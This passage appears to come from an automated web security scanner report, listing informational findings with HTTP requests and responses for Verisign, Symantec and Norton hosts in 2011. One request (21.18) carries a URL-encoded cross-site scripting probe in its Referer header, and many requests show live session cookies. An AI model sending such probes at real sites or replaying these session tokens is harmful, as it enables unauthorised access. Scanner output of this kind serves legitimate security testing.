User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B; JSESSIONID=V38gTqNQLHyLm2TQTSMmQ38tfyv2QBbTyZ1rpHfBJgYXTJS8hLvS!1676143451

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 22:04:07 GMT
Content-length: 11587
Content-type: text/html
Content-Language: en-US

<HTML><HEAD><TITLE>Symantec FileConnect - Electronic Software Distribution</TITLE>
<!--[if IE]>
<LINK REL=StyleSheet HREF="javascript/stylesie.css" TYPE="text/css" MEDIA=screen>
<![endif]
...[SNIP]...

21.16. https://forms.verisign.com/websurveys/servlet/ActionMultiplexer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://forms.verisign.com
Path:	/websurveys/servlet/ActionMultiplexer

Request

GET /websurveys/servlet/ActionMultiplexer HTTP/1.1
Host: forms.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 36
Date: Fri, 09 Sep 2011 21:41:07 GMT

Missing or unknown action ID: null

21.17. https://idprotect.verisign.com/common/scripts/dlText.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idprotect.verisign.com
Path:	/common/scripts/dlText.js

Request

GET /common/scripts/dlText.js HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/orderstart.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:50:57 GMT
Accept-Ranges: bytes
ETag: W/"19229-1310089722000"
Last-Modified: Fri, 08 Jul 2011 01:48:42 GMT
Content-Type: text/javascript
Content-Length: 19229
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

linkData['DL_0'] = 'Supported Mobile Devices';
linkData['DL_1'] = 'Select Your Mobile Device';
linkData['DL_2'] = 'Why You Have To Download, Activate, and Register Your ' + brand_productname;
linkData
...[SNIP]...

21.18. https://idprotect.verisign.com/secureredirect.v previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idprotect.verisign.com
Path:	/secureredirect.v

Request

GET /secureredirect.v?sid=0.08982152305543423 HTTP/1.1
Host: idprotect.verisign.com
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/home.v?141ab%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E41143d22db1=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:51:44 GMT
Content-Type: text/xml;charset=UTF-8
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 2195

<?xml version="1.0" encoding="UTF-8"?><document><redirectUrl>https://vipmobile.verisign.com/welcome.v</redirectUrl><timestamp>2011-09-09T21:51:44Z</timestamp><cert>-----BEGIN CERTIFICATE-----
MIIEVzCC
...[SNIP]...

21.19. https://idprotect.verisign.com/toolbar/downloadIE.v previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idprotect.verisign.com
Path:	/toolbar/downloadIE.v

Request

GET /toolbar/downloadIE.v HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/install.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:47:40 GMT
Content-disposition: filename="VIPAccessToolbarSetup.exe"
Content-Type: application/octet-stream
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 1936456

MZ......................@............................................. .!..L.!This program cannot be run in DOS mode.
$........M4..,Z..,Z..,Z..0V..,Z.f3Q..,Z.0T..,Z.f3P..,Z.$...,Z..,[..,Z...Q..,Z.
...[SNIP]...

21.20. https://knowledge.verisign.ch/support/code-signing-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/code-signing-support/index.html

Request

GET /support/code-signing-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.21. https://knowledge.verisign.ch/support/digital-id-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/digital-id-support/index.html

Request

GET /support/digital-id-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.22. https://knowledge.verisign.ch/support/mpki-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/mpki-support/index.html

Request

GET /support/mpki-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.23. https://knowledge.verisign.ch/support/ssl-certificates-support/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/ssl-certificates-support/index

Request

Response

21.24. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/ssl-certificates-support/index.html

Request

GET /support/ssl-certificates-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.25. https://knowledge.verisign.ch/support/trust-seal-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.ch
Path:	/support/trust-seal-support/index.html

Request

GET /support/trust-seal-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.26. https://knowledge.verisign.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: knowledge.verisign.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=0BA75884D1245C296CF5414E376DC3FC; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Last-Modified: Thu, 18 Aug 2011 11:31:30 GMT
ETag: "342ce-47e-4aac5f440a880"
Accept-Ranges: bytes
Content-Length: 1150
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/plain

............ .h.......(....... ..... .....@......................................>...........................................................q...................................9......................
...[SNIP]...

21.27. https://knowledge.verisign.com/support/code-signing-support/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/code-signing-support/index

Request

Response

21.28. https://knowledge.verisign.com/support/code-signing-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/code-signing-support/index.html

Request

GET /support/code-signing-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.29. https://knowledge.verisign.com/support/digital-id-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/digital-id-support/index.html

Request

Response

21.30. https://knowledge.verisign.com/support/eca-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/eca-support/index.html

Request

GET /support/eca-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.31. https://knowledge.verisign.com/support/mpki-for-ssl-support/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/mpki-for-ssl-support/index

Request

GET /support/mpki-for-ssl-support/index?page=content&id=AR1295&pmv=print&actp=PRINT&viewlocale=fr_FR HTTP/1.1
Host: knowledge.verisign.com
Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

21.32. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/mpki-for-ssl-support/index.html

Request

GET /support/mpki-for-ssl-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.33. https://knowledge.verisign.com/support/mpki-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/mpki-support/index.html

Request

GET /support/mpki-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.34. https://knowledge.verisign.com/support/ssl-certificates-support/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/ssl-certificates-support/index

Request

Response

21.35. https://knowledge.verisign.com/support/ssl-certificates-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/ssl-certificates-support/index.html

Request

GET /support/ssl-certificates-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.36. https://knowledge.verisign.com/support/trust-seal-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://knowledge.verisign.com
Path:	/support/trust-seal-support/index.html

Request

GET /support/trust-seal-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.37. https://partnernet.symantec.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://partnernet.symantec.com
Path:	/

Request

GET / HTTP/1.1
Host: partnernet.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:06 GMT
Server: Apache/2.2.15 (Unix)
Last-Modified: Thu, 12 May 2011 19:48:14 GMT
ETag: "70c638-47-4a3197842db80"
Accept-Ranges: bytes
Content-Length: 71
Connection: close
Content-Type: text/html

<meta http-equiv="refresh" content="0; URL=/Partnercontent/Login.jsp">

21.38. https://policy3.responsys.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://policy3.responsys.net
Path:	/

Request

GET / HTTP/1.1
Host: policy3.responsys.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:40:00 GMT
Server: Apache
Last-Modified: Wed, 19 May 2010 07:38:58 GMT
ETag: "2ef9310-155-486ed8d030880"
Accept-Ranges: bytes
Content-Length: 341
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Permission Policy</title>
<meta http-equiv="Refresh" content="0; URL=./permission.htm"
<meta http-equiv="Content-Ty
...[SNIP]...

21.39. https://policy3.responsys.net/permission.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://policy3.responsys.net
Path:	/permission.htm

Request

GET /permission.htm HTTP/1.1
Host: policy3.responsys.net
Connection: keep-alive
Referer: https://policy3.responsys.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:40:00 GMT
Server: Apache
Last-Modified: Wed, 19 May 2010 07:38:58 GMT
ETag: "2531311-130d-486ed8d030880"
Accept-Ranges: bytes
Content-Length: 4877
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Permission Policy</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
</head>
<body b
...[SNIP]...

21.40. https://policy3.responsys.net/privacy.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://policy3.responsys.net
Path:	/privacy.htm

Request

Response

21.41. https://press.verisign.com/easyir/customrel.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://press.verisign.com
Path:	/easyir/customrel.do

Request

GET /easyir/customrel.do HTTP/1.1
Host: press.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.42. https://products.verisign.com/geocenter/reseller/doregister.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://products.verisign.com
Path:	/geocenter/reseller/doregister.do

Request

GET /geocenter/reseller/doregister.do?vatCountry= HTTP/1.1
Host: products.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Sep 2011 21:46:19 GMT
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 8588

<html>
<head>

<title>Referring Partner Code Error</title>
<link href="/geocenter/style.css" type=text/css rel="stylesheet">
<style type=
...[SNIP]...

21.43. https://products.verisign.com/geocenter/reseller/logon.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://products.verisign.com
Path:	/geocenter/reseller/logon.do

Request

Response

21.44. https://products.verisign.com/geocenter/reseller/logon.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://products.verisign.com
Path:	/geocenter/reseller/logon.jsp

Request

GET /geocenter/reseller/logon.jsp HTTP/1.1
Host: products.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.45. https://products.verisign.com/geocenter/reseller/register.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://products.verisign.com
Path:	/geocenter/reseller/register.do

Request

GET /geocenter/reseller/register.do HTTP/1.1
Host: products.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Sep 2011 21:46:16 GMT
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 8588

<html>
<head>

<title>Referring Partner Code Error</title>
<link href="/geocenter/style.css" type=text/css rel="stylesheet">
<style type=
...[SNIP]...

21.46. https://query.verisign.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://query.verisign.com
Path:	/search

Request

GET /search HTTP/1.1
Host: query.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.47. https://renewals.symantec.com/renewals/application previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/renewals/application

Request

Response

21.48. https://renewals.symantec.com/renewals/chat_form.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/renewals/chat_form.jsp

Request

Response

21.49. https://renewals.symantec.com/renewals/chat_norton.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/renewals/chat_norton.jsp

Request

GET /renewals/chat_norton.jsp HTTP/1.1
Host: renewals.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:25 GMT
Content-Length: 1638
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN" xml:lang="EN">
<head>

...[SNIP]...

21.50. https://renewals.symantec.com/renewals/renewal_search.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/renewals/renewal_search.jsp

Request

GET /renewals/renewal_search.jsp HTTP/1.1
Host: renewals.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:25 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 21436

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />

<!-- BEGIN
...[SNIP]...

21.51. https://renewals.symantec.com/renewals/symantec_where_sn.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/renewals/symantec_where_sn.jsp

Request

GET /renewals/symantec_where_sn.jsp HTTP/1.1
Host: renewals.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:25 GMT
Content-Length: 10220
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

21.52. https://seal.verisign.com/getseal previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://seal.verisign.com
Path:	/getseal

Request

GET /getseal HTTP/1.1
Host: seal.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, must-revalidate
ETag:
Content-Type: text/javascript
Date: Fri, 09 Sep 2011 21:46:24 GMT
Connection: close

21.53. https://securitycenter.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://securitycenter.verisign.com
Path:	/

Request

GET / HTTP/1.1
Host: securitycenter.verisign.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=OqE1WkhKCKMQP1p2JJzrZf2h3PXz1qghWLRzUhS1WUJUiNzxbzTT!-1800460983

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:27:41 GMT
Content-length: 129
Content-type: text/html
Last-modified: Thu, 23 Dec 2004 19:39:49 GMT
Etag: "81-41cb1f05"
Accept-ranges: bytes

<html>
<head>
<meta http-equiv="Refresh" content="0; url=https://www.verisign.com/products/site/">
</head>
<body></body>
</html>

21.54. https://securitycenter.verisign.com/celp/enroll/outsideSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://securitycenter.verisign.com
Path:	/celp/enroll/outsideSearch

Request

Response

21.55. https://test-products.verisign.com/geocenter/reseller/logon.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://test-products.verisign.com
Path:	/geocenter/reseller/logon.do

Request

GET /geocenter/reseller/logon.do HTTP/1.1
Host: test-products.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.56. https://us.norton.com/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://us.norton.com
Path:	/index.jsp

Request

GET /index.jsp HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=2601
Date: Fri, 09 Sep 2011 21:47:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 90635

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Norton - Antivirus Software, Spyware Protection and Personal Firewall by Sym
...[SNIP]...

21.57. https://vipmobile.verisign.com/home.v previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://vipmobile.verisign.com
Path:	/home.v

Request

Response

21.58. https://vipmobile.verisign.com/supportedphones.v previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://vipmobile.verisign.com
Path:	/supportedphones.v

Request

Response

21.59. https://www-secure.symantec.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www-secure.symantec.com
Path:	/

Request

GET / HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1117
Date: Fri, 09 Sep 2011 21:47:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42824

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Symantec - AntiVirus, Anti-Spyware, Endpoint Security, Backup, Storage Solut
...[SNIP]...

21.60. https://www-secure.symantec.com/about/profile/policies/eulas/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www-secure.symantec.com
Path:	/about/profile/policies/eulas/index.jsp

Request

GET /about/profile/policies/eulas/index.jsp HTTP/1.1
Host: www-secure.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1717
Date: Fri, 09 Sep 2011 21:47:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 98373

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Product License Agreements - Symantec Corp.</title>
<meta http-equiv="Conten
...[SNIP]...

